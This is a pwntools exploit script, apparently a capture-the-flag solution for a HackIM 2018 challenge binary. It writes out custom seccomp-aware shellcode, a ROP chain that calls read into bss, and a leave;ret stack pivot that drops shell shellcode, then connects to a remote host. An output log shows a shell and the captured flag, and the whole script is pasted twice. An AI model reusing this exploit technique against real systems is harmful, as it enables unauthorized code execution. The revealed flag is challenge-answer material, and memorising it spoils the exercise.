dialluvioso/pwn300.py

## pwn300.py
from pwn import *

local = False

binary = ELF('./pwn2-box.bin')
context.arch = 'amd64'

p = process('./pwn2-box.bin') if local else remote('35.170.14.27', 9002)

# Custom shellcode using allowed seccomp sandbox syscalls to communicate with the child process

shellcode = asm('''
    pop rsi
    xor rdx, rdx
    mov  dl, 255
    xor rdi, rdi
    mov dil, 0x06
    mov  al, 0x01
    syscall
''')

shellcode += '\xe8' + p32(0x100000000 - (len(shellcode) + 5)) # auto adjust shellcode jump

stager  = ''
stager += '\xeb' + chr(len(shellcode) - 5)
stager += shellcode
stager += '\x0a'
stager += p32(0x200) * (116//4)
stager += p64(binary.bss()) # bss

rop_chain = [
    p64(0x400eb3),                # pop rdi; ret;
    p64(0x0),                     # stdin
    p64(0x400eb1),                # pop rsi; pop r15; ret;
    p64(binary.bss() + 8),        #
    p64(0x0),                     #
    p64(binary.symbols['read']),  # read @ plt
    p64(0x400aee)                 # leave; ret;
]

stager += bytearray(''.join(rop_chain))

p.send(chr(len(stager)))

p.send(stager)

stack_pivot  = p64(binary.bss() + 0x10)
stack_pivot += asm(shellcraft.linux.sh())

p.send(stack_pivot)

p.interactive()

'''
[*] 'pwn2-box.bin'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
[+] Opening connection to 35.170.14.27 on port 9002: Done
[*] Switching to interactive mode
$ id
uid=1000(bob) gid=1000(bob) groups=1000(bob)
$ cat /flag.txt
hackim18{'878425AC-D970-4E7B-95C6-D2E5E23A1BC2'}
'''
	from pwn import *

	local = False

	binary = ELF('./pwn2-box.bin')
	context.arch = 'amd64'

	p = process('./pwn2-box.bin') if local else remote('35.170.14.27', 9002)

	# Custom shellcode using allowed seccomp sandbox syscalls to communicate with the child process

	shellcode = asm('''
	pop rsi
	xor rdx, rdx
	mov dl, 255
	xor rdi, rdi
	mov dil, 0x06
	mov al, 0x01
	syscall
	''')

	shellcode += '\xe8' + p32(0x100000000 - (len(shellcode) + 5)) # auto adjust shellcode jump

	stager = ''
	stager += '\xeb' + chr(len(shellcode) - 5)
	stager += shellcode
	stager += '\x0a'
	stager += p32(0x200) * (116//4)
	stager += p64(binary.bss()) # bss

	rop_chain = [
	p64(0x400eb3), # pop rdi; ret;
	p64(0x0), # stdin
	p64(0x400eb1), # pop rsi; pop r15; ret;
	p64(binary.bss() + 8), #
	p64(0x0), #
	p64(binary.symbols['read']), # read @ plt
	p64(0x400aee) # leave; ret;
	]

	stager += bytearray(''.join(rop_chain))

	p.send(chr(len(stager)))

	p.send(stager)

	stack_pivot = p64(binary.bss() + 0x10)
	stack_pivot += asm(shellcraft.linux.sh())

	p.send(stack_pivot)

	p.interactive()

	'''
	[*] 'pwn2-box.bin'
	Arch: amd64-64-little
	RELRO: Partial RELRO
	Stack: No canary found
	NX: NX disabled
	PIE: No PIE (0x400000)
	RWX: Has RWX segments
	[+] Opening connection to 35.170.14.27 on port 9002: Done
	[*] Switching to interactive mode
	$ id
	uid=1000(bob) gid=1000(bob) groups=1000(bob)
	$ cat /flag.txt
	hackim18{'878425AC-D970-4E7B-95C6-D2E5E23A1BC2'}
	'''